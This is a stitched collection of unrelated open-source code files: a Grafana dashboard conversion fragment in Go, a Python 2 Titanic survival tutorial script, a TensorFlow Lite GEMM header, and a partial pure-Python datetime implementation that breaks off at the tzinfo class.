withConversionMetrics(dashv2beta1.APIVERSION, dashv0.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V2beta1_to_V0(a.(*dashv2beta1.Dashboard), b.(*dashv0.Dashboard), scope, dsIndexProvider)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv2beta1.Dashboard)(nil), (*dashv1.Dashboard)(nil),
withConversionMetrics(dashv2beta1.APIVERSION, dashv1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V2beta1_to_V1beta1(a.(*dashv2beta1.Dashboard), b.(*dashv1.Dashboard), scope, dsIndexProvider)
})); err != nil {
return err
}
if err := s.AddConversionFunc((*dashv2beta1.Dashboard)(nil), (*dashv2alpha1.Dashboard)(nil),
withConversionMetrics(dashv2beta1.APIVERSION, dashv2alpha1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
return Convert_V2beta1_to_V2alpha1(a.(*dashv2beta1.Dashboard), b.(*dashv2alpha1.Dashboard), scope)
})); err != nil {
return err
}
return nil
} | go | github | https://github.com/grafana/grafana | apps/dashboard/pkg/migration/conversion/conversion.go |
""" This simple code is desinged to teach a basic user to read in the files in python, simply find what proportion of males and females survived and make a predictive model based on this
Author : AstroDave
Date : 18 September 2012
Revised: 28 March 2014
"""
import csv as csv
import numpy as np
csv_file_object = csv.reader(open('train.csv', 'rb')) # Load in the csv file
header = csv_file_object.next() # Skip the fist line as it is a header
data=[] # Create a variable to hold the data
for row in csv_file_object: # Skip through each row in the csv file,
data.append(row[0:]) # adding each row to the data variable
data = np.array(data) # Then convert from a list to an array.
# Now I have an array of 12 columns and 891 rows
# I can access any element I want, so the entire first column would
# be data[0::,0].astype(np.float) -- This means all of the rows (from start to end), in column 0
# I have to add the .astype() command, because
# when appending the rows, python thought it was a string - so needed to convert
# Set some variables
number_passengers = np.size(data[0::,1].astype(np.float))
number_survived = np.sum(data[0::,1].astype(np.float))
proportion_survivors = number_survived / number_passengers
# I can now find the stats of all the women on board,
# by making an array that lists True/False whether each row is female
women_only_stats = data[0::,4] == "female" # This finds where all the women are
men_only_stats = data[0::,4] != "female" # This finds where all the men are (note != means 'not equal')
# I can now filter the whole data, to find statistics for just women, by just placing
# women_only_stats as a "mask" on my full data -- Use it in place of the '0::' part of the array index.
# You can test it by placing it there, and requesting column index [4], and the output should all read 'female'
# e.g. try typing this: data[women_only_stats,4]
women_onboard = data[women_only_stats,1].astype(np.float)
men_onboard = data[men_only_stats,1].astype(np.float)
# and derive some statistics about them
proportion_women_survived = np.sum(women_onboard) / np.size(women_onboard)
proportion_men_survived = np.sum(men_onboard) / np.size(men_onboard)
print 'Proportion of women who survived is %s' % proportion_women_survived
print 'Proportion of men who survived is %s' % proportion_men_survived
# Now that I have my indicator that women were much more likely to survive,
# I am done with the training set.
# Now I will read in the test file and write out my simplistic prediction:
# if female, then model that she survived (1)
# if male, then model that he did not survive (0)
# First, read in test.csv
test_file = open('test.csv', 'rb')
test_file_object = csv.reader(test_file)
header = test_file_object.next()
# Also open the a new file so I can write to it. Call it something descriptive
# Finally, loop through each row in the train file, and look in column index [3] (which is 'Sex')
# Write out the PassengerId, and my prediction.
predictions_file = open("gendermodel.csv", "wb")
predictions_file_object = csv.writer(predictions_file)
predictions_file_object.writerow(["PassengerId", "Survived"]) # write the column headers
for row in test_file_object: # For each row in test file,
if row[3] == 'female': # is it a female, if yes then
predictions_file_object.writerow([row[0], "1"]) # write the PassengerId, and predict 1
else: # or else if male,
predictions_file_object.writerow([row[0], "0"]) # write the PassengerId, and predict 0.
test_file.close() # Close out the files.
predictions_file.close() | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_LITE_KERNELS_CPU_BACKEND_GEMM_EIGEN_H_
#define TENSORFLOW_LITE_KERNELS_CPU_BACKEND_GEMM_EIGEN_H_
#ifndef TFLITE_WITH_RUY
#include "tensorflow/lite/kernels/cpu_backend_context.h"
#include "tensorflow/lite/kernels/cpu_backend_gemm_params.h"
namespace tflite {
namespace cpu_backend_gemm {
namespace detail {
struct GemmImplUsingEigen {
static void Run(const MatrixParams<float>& lhs_params, const float* lhs_data,
const MatrixParams<float>& rhs_params, const float* rhs_data,
const MatrixParams<float>& dst_params, float* dst_data,
const GemmParams<float, float>& params,
CpuBackendContext* /* context */);
};
} // namespace detail
} // namespace cpu_backend_gemm
} // namespace tflite
#endif // not TFLITE_WITH_RUY
#endif // TENSORFLOW_LITE_KERNELS_CPU_BACKEND_GEMM_EIGEN_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/lite/kernels/cpu_backend_gemm_eigen.h |
"""Concrete date/time and related types -- prototype implemented in Python.
See http://www.zope.org/Members/fdrake/DateTimeWiki/FrontPage
See also http://dir.yahoo.com/Reference/calendars/
For a primer on DST, including many current DST rules, see
http://webexhibits.org/daylightsaving/
For more about DST than you ever wanted to know, see
ftp://elsie.nci.nih.gov/pub/
Sources for time zone and DST data: http://www.twinsun.com/tz/tz-link.htm
This was originally copied from the sandbox of the CPython CVS repository.
Thanks to Tim Peters for suggesting using it.
"""
# from __future__ import division
import time as _time
import math as _math
# import struct as _struct
import _struct
def divmod(x, y):
x, y = int(x), int(y)
return x / y, x % y
_SENTINEL = object()
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
def _round(x):
return int(_math.floor(x + 0.5) if x >= 0.0 else _math.ceil(x - 0.5))
MINYEAR = 1
MAXYEAR = 9999
_MINYEARFMT = 1900
_MAX_DELTA_DAYS = 999999999
# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions. Difference: Dates.py calls January 1 of year 0 day
# number 1. The code here calls January 1 of year 1 day number 1. This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations. See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.
_DAYS_IN_MONTH = [-1, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
_DAYS_BEFORE_MONTH = [-1]
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
_DAYS_BEFORE_MONTH.append(dbm)
dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
"year, month -> number of days in that month in that year."
assert 1 <= month <= 12, month
if month == 2 and _is_leap(year):
return 29
return _DAYS_IN_MONTH[month]
def _days_before_month(year, month):
"year, month -> number of days in year preceding first day of month."
assert 1 <= month <= 12, 'month must be in 1..12'
return _DAYS_BEFORE_MONTH[month] + (month > 2 and _is_leap(year))
def _ymd2ord(year, month, day):
"year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
assert 1 <= month <= 12, 'month must be in 1..12'
dim = _days_in_month(year, month)
assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
return (_days_before_year(year) +
_days_before_month(year, month) +
day)
_DI400Y = _days_before_year(401) # number of days in 400 years
_DI100Y = _days_before_year(101) # " " " " 100 "
_DI4Y = _days_before_year(5) # " " " " 4 "
# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1
# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1
# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1
_US_PER_US = 1
_US_PER_MS = 1000
_US_PER_SECOND = 1000000
_US_PER_MINUTE = 60000000
_SECONDS_PER_DAY = 24 * 3600
_US_PER_HOUR = 3600000000
_US_PER_DAY = 86400000000
_US_PER_WEEK = 604800000000
def _ord2ymd(n):
"ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
# n is a 1-based index, starting at 1-Jan-1. The pattern of leap years
# repeats exactly every 400 years. The basic strategy is to find the
# closest 400-year boundary at or before n, then work with the offset
# from that boundary to n. Life is much clearer if we subtract 1 from
# n first -- then the values of n at 400-year boundaries are exactly
# those divisible by _DI400Y:
#
# D M Y n n-1
# -- --- ---- ---------- ----------------
# 31 Dec -400 -_DI400Y -_DI400Y -1
# 1 Jan -399 -_DI400Y +1 -_DI400Y 400-year boundary
# ...
# 30 Dec 000 -1 -2
# 31 Dec 000 0 -1
# 1 Jan 001 1 0 400-year boundary
# 2 Jan 001 2 1
# 3 Jan 001 3 2
# ...
# 31 Dec 400 _DI400Y _DI400Y -1
# 1 Jan 401 _DI400Y +1 _DI400Y 400-year boundary
n -= 1
n400, n = divmod(n, _DI400Y)
year = n400 * 400 + 1 # ..., -399, 1, 401, ...
# Now n is the (non-negative) offset, in days, from January 1 of year, to
# the desired date. Now compute how many 100-year cycles precede n.
# Note that it's possible for n100 to equal 4! In that case 4 full
# 100-year cycles precede the desired day, which implies the desired
# day is December 31 at the end of a 400-year cycle.
n100, n = divmod(n, _DI100Y)
# Now compute how many 4-year cycles precede it.
n4, n = divmod(n, _DI4Y)
# And now how many single years. Again n1 can be 4, and again meaning
# that the desired day is December 31 at the end of the 4-year cycle.
n1, n = divmod(n, 365)
year += n100 * 100 + n4 * 4 + n1
if n1 == 4 or n100 == 4:
assert n == 0
return year-1, 12, 31
# Now the year is correct, and n is the offset from January 1. We find
# the month via an estimate that's either exact or one too large.
leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
assert leapyear == _is_leap(year)
month = (n + 50) >> 5
preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
if preceding > n: # estimate is too large
month -= 1
preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
n -= preceding
assert 0 <= n < _days_in_month(year, month)
# Now the year and month are correct, and n is the offset from the
# start of that month: we're done!
return year, month, n+1
# Month and day names. For localized versions, see the calendar module.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
wday = (_ymd2ord(y, m, d) + 6) % 7
dnum = _days_before_month(y, m) + d
return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
# def _wrap_strftime(object, format, timetuple):
# year = timetuple[0]
# if year < _MINYEARFMT:
# raise ValueError("year=%d is before %d; the datetime strftime() "
# "methods require year >= %d" %
# (year, _MINYEARFMT, _MINYEARFMT))
# # Don't call utcoffset() or tzname() unless actually needed.
# freplace = None # the string to use for %f
# zreplace = None # the string to use for %z
# Zreplace = None # the string to use for %Z
# # Scan format for %z and %Z escapes, replacing as needed.
# newformat = []
# push = newformat.append
# i, n = 0, len(format)
# while i < n:
# ch = format[i]
# i += 1
# if ch == '%':
# if i < n:
# ch = format[i]
# i += 1
# if ch == 'f':
# if freplace is None:
# freplace = '%06d' % getattr(object,
# 'microsecond', 0)
# newformat.append(freplace)
# elif ch == 'z':
# if zreplace is None:
# zreplace = ""
# if hasattr(object, "_utcoffset"):
# offset = object._utcoffset()
# if offset is not None:
# sign = '+'
# if offset < 0:
# offset = -offset
# sign = '-'
# h, m = divmod(offset, 60)
# zreplace = '%c%02d%02d' % (sign, h, m)
# assert '%' not in zreplace
# newformat.append(zreplace)
# elif ch == 'Z':
# if Zreplace is None:
# Zreplace = ""
# if hasattr(object, "tzname"):
# s = object.tzname()
# if s is not None:
# # strftime is going to have at this: escape %
# Zreplace = s.replace('%', '%%')
# newformat.append(Zreplace)
# else:
# push('%')
# push(ch)
# else:
# push('%')
# else:
# push(ch)
# newformat = "".join(newformat)
# return _time.strftime(newformat, timetuple)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
assert name in ("utcoffset", "dst")
if offset is None:
return
if not isinstance(offset, timedelta):
raise TypeError("tzinfo.%s() must return None "
"or timedelta, not '%s'" % (name, type(offset)))
days = offset.days
if days < -1 or days > 0:
offset = 1440 # trigger out-of-range
else:
seconds = days * 86400 + offset.seconds
minutes, seconds = divmod(seconds, 60)
if seconds or offset.microseconds:
raise ValueError("tzinfo.%s() must return a whole number "
"of minutes" % name)
offset = minutes
if not -1440 < offset < 1440:
raise ValueError("%s()=%d, must be in -1439..1439" % (name, offset))
return offset
def _check_int_field(value):
if isinstance(value, int):
return int(value)
if not isinstance(value, float):
try:
value = value.__int__()
except AttributeError:
pass
else:
if isinstance(value, int):
return int(value)
elif isinstance(value, long):
return int(long(value))
raise TypeError('__int__ method should return an integer')
raise TypeError('an integer is required')
raise TypeError('integer argument expected, got float')
def _check_date_fields(year, month, day):
year = _check_int_field(year)
month = _check_int_field(month)
day = _check_int_field(day)
if not MINYEAR <= year <= MAXYEAR:
raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
if not 1 <= month <= 12:
raise ValueError('month must be in 1..12', month)
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
raise ValueError('day must be in 1..%d' % dim, day)
return year, month, day
def _check_time_fields(hour, minute, second, microsecond):
hour = _check_int_field(hour)
minute = _check_int_field(minute)
second = _check_int_field(second)
microsecond = _check_int_field(microsecond)
if not 0 <= hour <= 23:
raise ValueError('hour must be in 0..23', hour)
if not 0 <= minute <= 59:
raise ValueError('minute must be in 0..59', minute)
if not 0 <= second <= 59:
raise ValueError('second must be in 0..59', second)
if not 0 <= microsecond <= 999999:
raise ValueError('microsecond must be in 0..999999', microsecond)
return hour, minute, second, microsecond
def _check_tzinfo_arg(tz):
if tz is not None and not isinstance(tz, tzinfo):
raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
# Notes on comparison: In general, datetime module comparison operators raise
# TypeError when they don't know how to do a comparison themself. If they
# returned NotImplemented instead, comparison could (silently) fall back to
# the default compare-objects-by-comparing-their-memory-addresses strategy,
# and that's not helpful. There are two exceptions:
#
# 1. For date and datetime, if the other object has a "timetuple" attr,
# NotImplemented is returned. This is a hook to allow other kinds of
# datetime-like objects a chance to intercept the comparison.
#
# 2. Else __eq__ and __ne__ return False and True, respectively. This is
# so opertaions like
#
# x == y
# x != y
# x in sequence
# x not in sequence
# dict[x] = y
#
# don't raise annoying TypeErrors just because a datetime object
# is part of a heterogeneous collection. If there's no known way to
# compare X to a datetime, saying they're not equal is reasonable.
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
def _normalize_pair(hi, lo, factor):
if not 0 <= lo <= factor-1:
inc, lo = divmod(lo, factor)
hi += inc
return hi, lo
def _normalize_datetime(y, m, d, hh, mm, ss, us, ignore_overflow=False):
# Normalize all the inputs, and store the normalized values.
ss, us = _normalize_pair(ss, us, 1000000)
mm, ss = _normalize_pair(mm, ss, 60)
hh, mm = _normalize_pair(hh, mm, 60)
d, hh = _normalize_pair(d, hh, 24)
y, m, d = _normalize_date(y, m, d, ignore_overflow)
return y, m, d, hh, mm, ss, us
def _normalize_date(year, month, day, ignore_overflow=False):
# That was easy. Now it gets muddy: the proper range for day
# can't be determined without knowing the correct month and year,
# but if day is, e.g., plus or minus a million, the current month
# and year values make no sense (and may also be out of bounds
# themselves).
# Saying 12 months == 1 year should be non-controversial.
if not 1 <= month <= 12:
year, month = _normalize_pair(year, month-1, 12)
month += 1
assert 1 <= month <= 12
# Now only day can be out of bounds (year may also be out of bounds
# for a datetime object, but we don't care about that here).
# If day is out of bounds, what to do is arguable, but at least the
# method here is principled and explainable.
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
# Move day-1 days from the first of the month. First try to
# get off cheap if we're only one day out of range (adjustments
# for timezone alone can't be worse than that).
if day == 0: # move back a day
month -= 1
if month > 0:
day = _days_in_month(year, month)
else:
year, month, day = year-1, 12, 31
elif day == dim + 1: # move forward a day
month += 1
day = 1
if month > 12:
month = 1
year += 1
else:
ordinal = _ymd2ord(year, month, 1) + (day - 1)
year, month, day = _ord2ymd(ordinal)
if not ignore_overflow and not MINYEAR <= year <= MAXYEAR:
raise OverflowError("date value out of range")
return year, month, day
def _accum(tag, sofar, num, factor, leftover):
if isinstance(num, (int, long)):
prod = num * factor
rsum = sofar + prod
return rsum, leftover
if isinstance(num, float):
fracpart, intpart = _math.modf(num)
prod = int(intpart) * factor
rsum = sofar + prod
if fracpart == 0.0:
return rsum, leftover
assert isinstance(factor, (int, long))
fracpart, intpart = _math.modf(factor * fracpart)
rsum += int(intpart)
return rsum, leftover + fracpart
raise TypeError("unsupported type for timedelta %s component: %s" %
(tag, type(num)))
class timedelta(object):
"""Represent the difference between two datetime objects.
Supported operators:
- add, subtract timedelta
- unary plus, minus, abs
- compare to timedelta
- multiply, divide by int/long
In addition, datetime supports subtraction of two datetime objects
returning a timedelta, and addition or subtraction of a datetime
and a timedelta giving a datetime.
Representation: (days, seconds, microseconds). Why? Because I
felt like it.
"""
__slots__ = '_days', '_seconds', '_microseconds', '_hashcode'
def __new__(cls, days=_SENTINEL, seconds=_SENTINEL, microseconds=_SENTINEL,
milliseconds=_SENTINEL, minutes=_SENTINEL, hours=_SENTINEL, weeks=_SENTINEL):
x = 0
leftover = 0.0
if microseconds is not _SENTINEL:
x, leftover = _accum("microseconds", x, microseconds, _US_PER_US, leftover)
if milliseconds is not _SENTINEL:
x, leftover = _accum("milliseconds", x, milliseconds, _US_PER_MS, leftover)
if seconds is not _SENTINEL:
x, leftover = _accum("seconds", x, seconds, _US_PER_SECOND, leftover)
if minutes is not _SENTINEL:
x, leftover = _accum("minutes", x, minutes, _US_PER_MINUTE, leftover)
if hours is not _SENTINEL:
x, leftover = _accum("hours", x, hours, _US_PER_HOUR, leftover)
if days is not _SENTINEL:
x, leftover = _accum("days", x, days, _US_PER_DAY, leftover)
if weeks is not _SENTINEL:
x, leftover = _accum("weeks", x, weeks, _US_PER_WEEK, leftover)
if leftover != 0.0:
x += _round(leftover)
return cls._from_microseconds(x)
@classmethod
def _from_microseconds(cls, us):
s, us = divmod(us, _US_PER_SECOND)
d, s = divmod(s, _SECONDS_PER_DAY)
return cls._create(d, s, us, False)
@classmethod
def _create(cls, d, s, us, normalize):
if normalize:
s, us = _normalize_pair(s, us, 1000000)
d, s = _normalize_pair(d, s, 24*3600)
if not -_MAX_DELTA_DAYS <= d <= _MAX_DELTA_DAYS:
raise OverflowError("days=%d; must have magnitude <= %d" % (d, _MAX_DELTA_DAYS))
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
self._hashcode = -1
return self
def _to_microseconds(self):
return ((self._days * _SECONDS_PER_DAY + self._seconds) * _US_PER_SECOND +
self._microseconds)
def __repr__(self):
module = "datetime." if self.__class__ is timedelta else ""
if self._microseconds:
return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
self._days,
self._seconds,
self._microseconds)
if self._seconds:
return "%s(%d, %d)" % (module + self.__class__.__name__,
self._days,
self._seconds)
return "%s(%d)" % (module + self.__class__.__name__, self._days)
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
# return self._to_microseconds() / 10**6
return float(self._to_microseconds()) / float(10**6)
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds,
True)
return NotImplemented
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds,
True)
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(-self._days,
-self._seconds,
-self._microseconds,
True)
def __pos__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta._create(self._days,
self._seconds,
self._microseconds,
False)
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if not isinstance(other, (int, long)):
return NotImplemented
usec = self._to_microseconds()
return timedelta._from_microseconds(usec * other)
__rmul__ = __mul__
def __div__(self, other):
if not isinstance(other, (int, long)):
return NotImplemented
usec = self._to_microseconds()
# return timedelta._from_microseconds(usec // other)
return timedelta._from_microseconds(int(usec) / int(other))
__floordiv__ = __div__
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
def __nonzero__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-_MAX_DELTA_DAYS)
timedelta.max = timedelta(_MAX_DELTA_DAYS, 24*3600-1, 1000000-1)
timedelta.resolution = timedelta(microseconds=1)
class date(object):
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__cmp__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
# if month is None and isinstance(year, bytes) and len(year) == 4 and \
# 1 <= ord(year[2]) <= 12:
# # Pickle support
# self = object.__new__(cls)
# self.__setstate(year)
# self._hashcode = -1
# return self
year, month, day = _check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
self._hashcode = -1
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Contruct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
module = "datetime." if self.__class__ is date else ""
return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
# def strftime(self, format):
# "Format using strftime()."
# return _wrap_strftime(self, format, self.timetuple())
def __format__(self, fmt):
if not isinstance(fmt, (str, unicode)):
raise ValueError("__format__ expects str or unicode, not %s" %
fmt.__class__.__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
# return "%04d-%02d-%02d" % (self._year, self._month, self._day)
return "%s-%s-%s" % (str(self._year).zfill(4), str(self._month).zfill(2), str(self._day).zfill(2))
__str__ = isoformat
# Read-only field accessors
@property
def year(self):
"""year (1-9999)"""
return self._year
@property
def month(self):
"""month (1-12)"""
return self._month
@property
def day(self):
"""day (1-31)"""
return self._day
# Standard conversions, __cmp__, __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
"""Return a new date with new values for the specified fields."""
if year is None:
year = self._year
if month is None:
month = self._month
if day is None:
day = self._day
return date.__new__(type(self), year, month, day)
# Comparisons of date objects with other.
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
return False
def __ne__(self, other):
if isinstance(other, date):
return self._cmp(other) != 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
return True
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
elif hasattr(other, "timetuple"):
return NotImplemented
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
if self._hashcode == -1:
self._hashcode = hash(self._getstate())
return self._hashcode
# Computations
def _add_timedelta(self, other, factor):
y, m, d = _normalize_date(
self._year,
self._month,
self._day + other.days * factor)
return date(y, m, d)
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
return self._add_timedelta(other, 1)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta._create(days1 - days2, 0, 0, False)
if isinstance(other, timedelta):
return self._add_timedelta(other, -1)
return NotImplemented
def weekday(self):
"Return day of the week, where Monday == 0 ... Sunday == 6."
return (self.toordinal() + 6) % 7
# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
"Return day of the week, where Monday == 1 ... Sunday == 7."
# 1-Jan-0001 is a Monday
return self.toordinal() % 7 or 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
return (_struct.pack('4B', yhi, ylo, self._month, self._day),)
def __setstate(self, string):
yhi, ylo, self._month, self._day = (ord(string[0]), ord(string[1]),
ord(string[2]), ord(string[3]))
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo(object):
"""Abstract base class for time zone info classes.
